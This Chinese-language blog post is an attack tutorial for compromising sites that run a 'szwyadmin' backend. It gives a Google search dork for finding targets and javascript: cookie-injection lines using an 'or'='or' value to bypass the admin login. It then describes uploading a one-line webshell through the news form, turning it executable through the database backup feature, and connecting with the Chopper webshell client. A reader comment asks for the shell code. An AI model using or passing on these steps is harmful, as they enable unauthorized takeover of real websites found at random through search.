利用关键字后台批量拿shell

博主推荐【腾讯云】爆款2核2G云服务器首年40元

google:关键字:inurl:szwyadmin/login.asp

打开任意一个搜索结果,打开后台登录界面后,在地址栏中全部替换成下面代码:

javascript:alert(document.cookie=”adminuser=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”admindj=”+escape(“1”));

如果以上的代码不能使用请下载:http://pan.baidu.com/s/11PuhB

然后关闭此页面
再次打开后台登录界面
在地址栏中把login.asp改为admin_index.asp
就直接进入后台了。

进入后台后在添加新闻的地方上传一句话后,复制链接地址:

szwyadmin

然后点击备份如下图:

20131022124743

然后点击备份数据,备份成功后得到地址:

20131022130809

拿起菜刀链接:

20131022125456

 

原创文章转载请注明:转载自 七行者博客

本文固定链接: https://www.qxzxp.com/3731.html

利用关键字后台批量拿shell:目前有2 条留言

  1. 0楼
    tester:

    您好,添加新闻的地方的一句话具体代码是?谢谢!麻烦发到邮箱jxbsuedu@gmail.com

    2014-07-28 14:31 [回复]
  2. 0楼
    小飞龙:

    学习了

    2013-10-23 05:36 [回复]

发表评论

1 + 3 =

快捷键:Ctrl+Enter